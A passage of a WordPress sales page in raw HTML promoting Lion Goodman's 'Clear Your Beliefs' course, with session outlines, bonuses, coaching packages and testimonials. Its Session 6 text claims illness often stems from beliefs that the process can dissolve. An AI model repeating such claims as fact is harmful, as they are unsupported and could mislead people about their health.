possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the 